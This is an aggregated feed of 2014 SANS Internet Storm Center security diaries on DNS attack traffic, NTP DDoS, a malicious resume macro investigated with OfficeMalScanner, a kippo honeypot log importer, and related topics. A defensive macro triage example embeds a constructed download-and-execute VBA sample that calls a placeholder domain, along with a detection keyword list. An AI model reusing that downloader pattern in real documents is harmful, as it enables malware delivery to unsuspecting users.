Alerts

Do you have some DNS requests/replies you could share?, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 18:03

Looking at DNS traffic, it looks like it has been a busy month, but traffic seems to have dropped off.

Port 53 as a target has dropped off, and during June there was an increase in traffic with a source port of 53, something we've seen on various IDSs. We see one of two types of packets. The first is a request for ANY for a particular domain with the packet size set to 65535 and a spoofed source IP (i.e. the target). That accounts for the traffic to port 53.

The second type of request we see is from port 53, typically with random source ports and typically to a number of servers in the target network. The only thing that changes is often the query ID, so these are likely attempts to poison the cache.

The third type we see is DNS requests to check for open resolvers, and a final type of query we see a lot of is DNS queries with HTTP elements in the traffic.
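As an added illustration of how captured DNS traffic could be sorted into the types described above (example code written for this page, not ISC's or any IDS vendor's detection logic), here is a Python classifier over constructed packet summaries. The addresses, zone names, field layout and thresholds are assumptions; real detection would work from a pcap or a resolver's query log.

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class DnsPacket:
    """Constructed per-packet summary; field names are this example's own."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    qid: int
    qname: str
    qtype: str
    response: bool      # QR bit: True for a reply, False for a query
    rd: bool            # recursion-desired flag
    edns_size: int      # advertised UDP payload size from the OPT record, 0 if none
    payload_hint: str = ""   # start of any non-DNS bytes carried in the datagram

OUR_SERVERS = {"203.0.113.10", "203.0.113.11"}   # constructed (RFC 5737 test range)
OUR_ZONES = ("example.net.",)                     # constructed: zones we serve

def classify(pkt):
    """Label one packet with the traffic type it resembles, or None."""
    if pkt.payload_hint.startswith(("GET ", "POST ")) or "HTTP/1." in pkt.payload_hint:
        return "http-in-dns"
    if pkt.response or pkt.dst_port != 53:
        return None
    if pkt.qtype == "ANY" and pkt.edns_size >= 4096:
        # a maximal answer requested; the source is probably the real target (spoofed)
        return "any-amplification"
    if pkt.rd and pkt.dst_ip in OUR_SERVERS and not pkt.qname.endswith(OUR_ZONES):
        # recursive lookup of a name we are not authoritative for: resolver probing
        return "open-resolver-probe"
    return None

def find_poison_attempts(packets, outstanding, min_ids=3):
    """Group replies from port 53 that answer no query we sent; several such replies
    for the same name from one source with differing IDs suggests ID guessing."""
    seen = defaultdict(set)
    for p in packets:
        if p.response and p.src_port == 53 and p.dst_ip in OUR_SERVERS \
                and (p.dst_ip, p.dst_port, p.qid) not in outstanding:
            seen[(p.src_ip, p.dst_ip, p.qname)].add(p.qid)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_ids}

# Constructed sample traffic covering the types the diary describes.
SAMPLE = [
    DnsPacket("198.51.100.7", 40000, "203.0.113.10", 53, 1, "example.net.", "ANY", False, True, 65535),
    DnsPacket("198.51.100.20", 5353, "203.0.113.10", 53, 2, "www.example.net.", "A", False, True, 4096),
    DnsPacket("198.51.100.21", 5353, "203.0.113.10", 53, 3, "www.example.org.", "A", False, True, 512),
    DnsPacket("198.51.100.22", 5353, "203.0.113.10", 53, 4, "", "", False, False, 0, "GET / HTTP/1.1"),
    DnsPacket("192.0.2.5", 53, "203.0.113.11", 33001, 100, "bank.example.com.", "A", True, False, 0),
    DnsPacket("192.0.2.5", 53, "203.0.113.11", 33002, 101, "bank.example.com.", "A", True, False, 0),
    DnsPacket("192.0.2.5", 53, "203.0.113.11", 33003, 102, "bank.example.com.", "A", True, False, 0),
    DnsPacket("192.0.2.9", 53, "203.0.113.11", 44000, 7, "www.example.com.", "A", True, False, 0),
]
# The one reply we actually asked for: (our ip, our ephemeral port, query id).
OUTSTANDING = {("203.0.113.11", 44000, 7)}

def summarize(packets=SAMPLE, outstanding=OUTSTANDING):
    """Per-packet labels plus the grouped unsolicited-reply sets."""
    return [classify(p) for p in packets], find_poison_attempts(packets, outstanding)

if __name__ == "__main__":
    labels, poison = summarize()
    for p, label in zip(SAMPLE, labels):
        print(f"{p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port} {p.qtype:4} {label}")
    print("unsolicited reply groups:", poison)
```

The poisoning heuristic depends on knowing which queries the resolver actually has in flight, which is why the example keeps an `OUTSTANDING` set; without that correlation, a burst of replies from port 53 cannot be told apart from a legitimate answer stream.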

There are a few things I'm interested in: what caused the drop-off for port 53 as the target? What DNS queries are you seeing targeting your environment? And if you can share, I'd be interested in the actual request itself.

Regards

Mark H

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC StormCast for Wednesday, June 25th 2014 http://isc.sans.edu/podcastdetail.html?id=4037, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 17:49

Spam, talk about false advertising, (Wed, Jun 25th)

Latest Alerts - Tue, 06/24/2014 - 17:38

SPAM SPAM SPAM. It never fails to entertain.

Like most of you I get my fair share of SPAM and like a number of you I will happily click links (not a recommendation) and follow the little yellow brick road to whatever malware or "sales" opportunity presents itself.  This one was just a bit more random than others I've received lately.  


A quote for a home security system; great, I need one of those, the dog is just not interested in chasing away strangers that walk up to the house. Following the link I end up on the following page, after a redirect from the libbean page.

Ok, not quite the home security system I was hoping for, but I like a game as much as the next guy. Unfortunately, hitting the "download for free" button I didn't get the promised flappy birds, but ended up here instead.

Now I don't know if Vox software is just a random landing or the SPAM run was commissioned. If the latter, there are organisations that have no problem using SPAM for "legitimate" advertising, or they are just not aware. Not quite sure which is worse.

So every now and then SPAM does have some entertainment value, at least to me. I didn't get the home security system I was promised though, nor a fun game to play. Ah well.

Cheers

Mark H


NTP DDoS Counts Have Dropped, (Tue, Jun 24th)

Latest Alerts - Tue, 06/24/2014 - 13:49

I was poking around the usual online rags and found a piece on Threat Post. [1]  Mike Mimoso was highlighting the decline of the NTP DDoS hole found earlier in the year.  The ISC covered it in our diary a few months back.  

NTP Reflection Attack 
Ongoing NTP Amplification Attacks
NTP Reflection Attacks Continue

So, I went poking through the port data and noticed a good correlation to the Threat Post story. The numbers indicate a sharp decrease in vulnerable systems for the NTP monlist issue. I'd like to suggest that while pundits are citing slow progress for patching Heartbleed, in actuality the Heartbleed issue is responsible for the sudden change. The month of May showed an extensive effort for patching and truing up patch levels because of Heartbleed. This effort likely assisted in the NTP issue being patched along with it. The following graph was taken from ISC data gathered here:

https://isc.sans.edu/port.html?&port=123

Feel free to share your thoughts on this one.

[1] http://threatpost.com/dramatic-drop-in-vulnerable-ntp-servers-used-in-ddos-attacks/106835


ISC StormCast for Tuesday, June 24th 2014 http://isc.sans.edu/podcastdetail.html?id=4035, (Tue, Jun 24th)

Latest Alerts - Mon, 06/23/2014 - 19:19

Microsoft Interflow announced today at 26th FIRST conference, (Mon, Jun 23rd)

Latest Alerts - Mon, 06/23/2014 - 08:36

Microsoft announced a private preview of Microsoft Interflow today, timed with the 26th FIRST Conference in Boston. While it's not available for general release yet, this is the first public announcement of a project I've been tracking internally for a while (I work at MSFT). Be patient, your opportunity is coming; this is good news for the DFIR community. Microsoft Interflow is a security and threat information exchange platform for professionals working in cybersecurity, and allows collaboration for a collectively stronger ecosystem, action prioritization through automation, and integration via a plug-in architecture. There's a write-up on the benefits as well as an FAQ so you can learn more. Microsoft Interflow, as a security automation platform for the exchange of security and threat information, is based on the STIX (Structured Threat Information eXpression), TAXII (Trusted Automated eXchange of Indicator Information), and CybOX (Cyber Observable eXpression) specifications. This is all good news as it means that we're getting closer to general release.

Russ McRee | @holisticinfosec

ISC StormCast for Monday, June 23rd 2014 http://isc.sans.edu/podcastdetail.html?id=4033, (Mon, Jun 23rd)

Latest Alerts - Sun, 06/22/2014 - 18:13

OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

Latest Alerts - Sat, 06/21/2014 - 21:24

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not used before.

In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content via a malicious ad or a site compromised with a web exploit kit, or a malicious link or document attachment via email. One interesting variable stood out while reviewing the victim's PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim's system, so I simply needed to see if there was a malicious email that had arrived prior, based on time stamps. One particular email with a Word doc attached stood right out, as it arrived at 12:23am on the same day as the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name.

Unfortunately, technical details for W97M/Ledod.A were weak at best and all I had to go from initially was "this trojan can download and run other malware or potentially unwanted software onto your PC." Yeah, thanks for that. What is a poor forensicator to do? Frank Boldewin's (Reconstructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files, as well as pulling macro details from nasty Office documents. As always, when you choose to interact with mayhem, it's best to do so in an isolated environment; I run OfficeMalScanner on a Windows 7 virtual machine. If you just run OfficeMalScanner without defining any parameters, it kindly dumps options for you as seen in Figure 1.

Figure 1

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan, the result "No malicious traces found in this file!" was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt, as seen in Figure 2.

Figure 2

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

Figure 3
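Once the macro text has been dumped, the next step is to read it for what runs automatically, what capabilities it uses, and where it reaches out to. The following Python triage is an added example, not part of OfficeMalScanner or of this diary; its VBA sample, domain and file names are constructed placeholders, and the keyword list and scoring are assumptions chosen for illustration.

```python
import re

# Constructed VBA text standing in for a dumped ThisDocument module. The URL and
# file names are placeholders, not indicators from the case described above.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
    Dim u As String
    u = "http://placeholder-bad-domain.example/dl/payload.exe"
    Call URLDownloadToFile(0, u, Environ("TEMP") & "\stage.exe", 0, 0)
    Shell Environ("TEMP") & "\stage.exe", vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = r'''
Sub FormatTitles()
    Selection.Font.Bold = True
End Sub
'''

# Procedure names Office runs without user interaction (assumed list, not exhaustive).
AUTOEXEC = ("Document_Open", "AutoOpen", "Workbook_Open", "Auto_Open",
            "AutoExec", "Document_Close", "AutoClose")
# Capabilities worth a second look, with a short note on why.
SUSPICIOUS = {
    "URLDownloadToFile": "downloads a file from a URL",
    "Shell": "launches a program",
    "CreateObject": "instantiates COM objects (WScript.Shell, XMLHTTP, ADODB.Stream)",
    "WScript.Shell": "scriptable shell access",
    "ADODB.Stream": "writes binary data to disk",
    "Environ": "reads environment variables such as TEMP",
    "Chr(": "builds strings from character codes (common obfuscation)",
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def triage_macro(text):
    """Heuristic triage of dumped VBA: what runs automatically, which capabilities
    it uses and where it talks to. Scoring weights are illustrative assumptions."""
    autoexec = [n for n in AUTOEXEC if re.search(r"\bSub\s+" + n + r"\b", text)]
    caps = {k: v for k, v in SUSPICIOUS.items()
            if re.search(r"(?<![A-Za-z0-9_])" + re.escape(k), text)}
    urls = sorted(set(URL_RE.findall(text)))
    ips = sorted(set(IP_RE.findall(text)))
    score = 3 * len(autoexec) + 2 * len(caps) + 2 * len(urls) + 2 * len(ips)
    # Auto-run plus a fetch plus a launch is the classic downloader shape.
    if autoexec and ("URLDownloadToFile" in caps or urls) and "Shell" in caps:
        verdict = "download-and-execute"
    elif score >= 5:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"autoexec": autoexec, "capabilities": caps, "urls": urls,
            "ips": ips, "score": score, "verdict": verdict}

if __name__ == "__main__":
    for name, macro in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        result = triage_macro(macro)
        print(f"{name}: {result['verdict']} (score {result['score']})")
        for url in result["urls"]:
            print("  contacts:", url)
        for cap, why in result["capabilities"].items():
            print(f"  {cap}: {why}")
```

The extracted URLs and IPs are what you would then pivot on in virustotal.com or urlquery.net, as the diary goes on to do; the verdict is only a prioritisation aid, since a macro that builds its strings with Chr() or string concatenation will hide the URL from the regex and show up only through the capability and obfuscation hits.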

A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know, pure Lithuanian evil in the form of IP address 5.199.165.239.  
A bit of trekking through all the malicious exe's known to be associated with that IP address and voila, I had my source.

See Jared Greenhill's writeup on these same concepts at EMC's RSA Security Analytics Blog and our own Lenny Zeltser's Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner's RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I'll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec


New tool: kippo-log2db.pl, (Fri, Jun 20th)

Latest Alerts - Fri, 06/20/2014 - 13:01

I've been running kippo for several years now on a couple of honeypots that I have around, and when I started I was just logging to the text logs that kippo can create. Since then, kippo now supports logging directly to a MySQL database, and some other folks (especially Ioannis “Ion” Koniaris at bruteforce.gr) have created some nice tools to generate reports from kippo data. These tools expect the data to be in the kippo MySQL database schema. Having logged several years' worth of stuff to the text log files, I didn't want to lose all that data, but I did want to be able to take advantage of some of the neat tools that Ion has developed, so I needed a way to get that data from the text logs to the supported db schema. Now Ion had created a script that he called Kippo2MySQL, but that converted things to his own schema and lost some data in the process. Using that as inspiration, however, I have created a script that will read the kippo text logs and populate a kippo database (using the same schema that kippo can now log to directly).

The only hitch that I discovered is that when kippo is logging to text logs and restarts, it doesn't maintain unique session ids; it starts over again from 1. This caused me to have to make a small change to the sessions table: I had to change the primary key from ID to (ID,STARTTIME). Fortunately, I haven't had any collisions where multiple sessions with the same id actually had ttylogs, which is where things might get a bit sketchy. This was accomplished with

mysql> alter table sessions drop primary key, add primary key(id,starttime);

yielding

mysql> show create table sessions\G
*************************** 1. row ***************************
       Table: sessions
Create Table: CREATE TABLE `sessions` (
  `id` char(32) NOT NULL,
  `starttime` datetime NOT NULL,
  `endtime` datetime DEFAULT NULL,
  `sensor` int(4) NOT NULL,
  `ip` varchar(15) NOT NULL DEFAULT '',
  `termsize` varchar(7) DEFAULT NULL,
  `client` int(4) DEFAULT NULL,
  PRIMARY KEY (`id`,`starttime`),
  KEY `starttime` (`starttime`,`sensor`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1
1 row in set (0.01 sec)

I've imported about 800K login attempts and can now play with kippo-graph or (soon, I haven't had the chance yet) kippo2elasticsearch. The script can be found at the link in the references below, though I have one small issue that I'll try to fix shortly: I think it is printing out too many #'s. I set it to print out 1 every 10,000 lines it reads from the log files and it seems like I'm getting way more than that, but that is a minor annoyance; maybe I'll just add a switch to turn that off later. In the meantime, enjoy, and if you find any problems or have ideas for improvement, let me know either in the comments or by e-mail at my address below.
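To make the restart problem concrete, here is an added Python example (not Jim's kippo-log2db.pl and not kippo's own code) that parses a few constructed lines written in the style of kippo's text log, keys each session by (id, starttime), and loads the result into an in-memory SQLite copy of a reduced sessions/auth schema. The line shapes, the sensor number and the reduced column set are assumptions; running the loader once with the composite key and once with the original single-column key shows the collision the diary describes.

```python
import re
import sqlite3

# Constructed log lines approximating kippo's text-log format (not a real capture).
# Note the session id restarting at 1 after the honeypot restart on 06/20.
SAMPLE_LOG = """\
2014-06-19 10:00:01+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 198.51.100.7:51234 (203.0.113.5:2222) [session: 1]
2014-06-19 10:00:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/123456] failed
2014-06-19 10:00:05+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/toor] succeeded
2014-06-19 10:00:09+0000 [HoneyPotTransport,1,198.51.100.7] connection lost
2014-06-20 08:00:00+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 192.0.2.33:40000 (203.0.113.5:2222) [session: 1]
2014-06-20 08:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,192.0.2.33] login attempt [admin/admin] failed
2014-06-20 08:00:04+0000 [HoneyPotTransport,1,192.0.2.33] connection lost
""".splitlines()

NEW = re.compile(r"^(\S+ \S+) \[[^\]]*\] New connection: ([\d.]+):\d+ \([^)]*\) \[session: (\d+)\]$")
AUTH = re.compile(r"^(\S+ \S+) \[[^\]]*HoneyPotTransport,(\d+),[\d.]+\] login attempt \[(.*?)/(.*)\] (failed|succeeded)$")
LOST = re.compile(r"^(\S+ \S+) \[[^\]]*HoneyPotTransport,(\d+),[\d.]+\] connection lost$")

def parse_kippo_log(lines, sensor=1):
    """Return (sessions, auths). sessions is keyed by (id, starttime) because the
    text-log session id restarts from 1 whenever kippo restarts; open_by_id maps
    the id currently in use to the full key so later lines attach correctly."""
    sessions, auths, open_by_id = {}, [], {}
    for line in lines:
        if m := NEW.match(line):
            ts, ip, sid = m.group(1)[:19], m.group(2), m.group(3)   # drop the +0000 offset
            open_by_id[sid] = (sid, ts)
            sessions[(sid, ts)] = {"endtime": None, "sensor": sensor, "ip": ip}
        elif m := AUTH.match(line):
            ts, sid, user, pw, result = m.groups()
            key = open_by_id.get(sid)
            if key:    # ignore attempts whose session start we never saw
                auths.append((key, result == "succeeded", user, pw, ts[:19]))
        elif m := LOST.match(line):
            ts, sid = m.groups()
            key = open_by_id.pop(sid, None)
            if key:
                sessions[key]["endtime"] = ts[:19]
    return sessions, auths

def build_db(lines, composite_key=True):
    """Load parsed data into an in-memory SQLite version of reduced sessions/auth
    tables. Returns (session_rows, auth_rows, error); error carries the constraint
    failure text when the single-column key rejects a restarted session id."""
    pk = "PRIMARY KEY (id, starttime)" if composite_key else "PRIMARY KEY (id)"
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE sessions (id TEXT NOT NULL, starttime TEXT NOT NULL, "
                 f"endtime TEXT, sensor INTEGER NOT NULL, ip TEXT NOT NULL, {pk})")
    conn.execute("CREATE TABLE auth (session_id TEXT, session_start TEXT, success INTEGER, "
                 "username TEXT, password TEXT, timestamp TEXT)")
    sessions, auths = parse_kippo_log(lines)
    error = None
    try:
        for (sid, start), s in sessions.items():
            conn.execute("INSERT INTO sessions VALUES (?,?,?,?,?)",
                         (sid, start, s["endtime"], s["sensor"], s["ip"]))
        for (sid, start), ok, user, pw, ts in auths:
            conn.execute("INSERT INTO auth VALUES (?,?,?,?,?,?)",
                         (sid, start, int(ok), user, pw, ts))
    except sqlite3.IntegrityError as e:
        error = str(e)
    ns = conn.execute("SELECT COUNT(*) FROM sessions").fetchone()[0]
    na = conn.execute("SELECT COUNT(*) FROM auth").fetchone()[0]
    conn.close()
    return ns, na, error

if __name__ == "__main__":
    print("composite key  :", build_db(SAMPLE_LOG, composite_key=True))
    print("single-col key :", build_db(SAMPLE_LOG, composite_key=False))
```

With the single-column key the second session numbered 1 fails on a UNIQUE constraint and nothing after it is loaded; with (id, starttime) both sessions and all three login attempts land, which is exactly why the diary's alter table was needed. The auth table here carries the session's start time alongside its id for the same reason: the id alone no longer identifies a session.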

References:

http://handlers.sans.org/jclausing/kippo-log2db.pl

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


ISC StormCast for Friday, June 20th 2014 http://isc.sans.edu/podcastdetail.html?id=4031, (Fri, Jun 20th)

Latest Alerts - Thu, 06/19/2014 - 18:37

New Supermicro IPMI/BMC Vulnerability, (Thu, Jun 19th)

Latest Alerts - Thu, 06/19/2014 - 13:52

A new vulnerability has been released by the CARI.net team regarding Supermicro’s implementation of IPMI/BMC for management.  The vulnerability involves a plaintext password file available for download simply by connecting to the specific port, 49152.  One of our team has tested this vulnerability, and it works like a champ, so let’s add another log to the fire and spread the good word.  The CARI.net team has a great writeup on the vulnerability linked below:

http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/

Much thanks to Zach at CARI.net for the heads-up.

tony d0t carothers --gmail


WordPress and Security, (Thu, Jun 19th)

Latest Alerts - Thu, 06/19/2014 - 08:35

The state of the systems we use in our day-to-day lives, typically outside our place of business, is ours to use and abuse as we see fit. As such, we are also responsible for the security of said systems, and one of the oft-overlooked is WordPress. The WordPress application is used by many SOHO users, and is as vulnerable to attack as anything out there today. WordPress can be secured, and with a bit of effort and guidance, fairly easily. The WordPress.Org site has a great hardening guide for WordPress that covers most aspects of securing their application: http://codex.wordpress.org/Hardening_WordPress

If the instance of WordPress is running on a shared server, as most are, then working with the local hosting company may be necessary if they are behind on patching, updating, etc.  If their host is compromised, then everything you do for your instance of WordPress can be easily undermined at the OS level.  If you choose to use tools, such as Metasploit or ZAP to test your application, ensure it is done within the confines of the User Agreement in place for your hosting site.  

tony d0t carothers --gmail


ISC StormCast for Thursday, June 19th 2014 http://isc.sans.edu/podcastdetail.html?id=4029, (Thu, Jun 19th)

Latest Alerts - Wed, 06/18/2014 - 18:12

Windows XP, slow to die :-( , (Wed, Jun 18th)

Latest Alerts - Wed, 06/18/2014 - 05:12

After traveling around the past few months in various countries, it looks like getting rid of Windows XP is going to take quite a while. It is probably due to the fact that it has expired that I noticed it more than usual, but XP is certainly everywhere. You see it at airports on display boards and Point of Sale systems. In one overseas country I saw it on the computers in customs, as well as the railway displays and control systems, and in hospitals.

Having obsolete operating systems in a corporate environment is bad enough; there are still many organisations that utilise XP internally. However, as part of critical infrastructure it worries me slightly more. Now most of us can't do much outside of our little sphere of influence, but it is time for the operating system to go.

So if junior needs something to do over the next few weeks, set them a challenge. Identify all remaining XP devices connected to the network. Categorise them into real XP and embedded XP (still some support available for those). Then develop a strategy to get rid of them.

If getting rid of them is not an option, and there will be those of you in that situation, at least look for ways of protecting them a bit better. Consider network segmentation, application whitelisting, and endpoint solutions (some will still work on XP). As an absolute minimum, at least know where they are and how they are being used.

Seek, identify and remove away.

Mark H  


VMSA-2014-0006.2 updates OpenSSL libraries in VMWare, (Wed, Jun 18th)

Latest Alerts - Wed, 06/18/2014 - 04:30

An update was released today addressing the OpenSSL issues in VMWare products. Libraries have been updated to 0.9.8za and 1.0.1h to fix issues.   

You'll want to evaluate and apply the updates as appropriate.  

Mark H


ISC StormCast for Wednesday, June 18th 2014 http://isc.sans.edu/podcastdetail.html?id=4027, (Wed, Jun 18th)

Latest Alerts - Tue, 06/17/2014 - 17:14

Bro 2.3 released - new here: http://blog.bro.org/2014/06/bro-23-release.html, release notes here: http://www.bro.org/sphinx-git/install/release-notes.html, (Tue, Jun 17th)

Latest Alerts - Tue, 06/17/2014 - 15:46

===============
Rob VandenBrink
Metafore
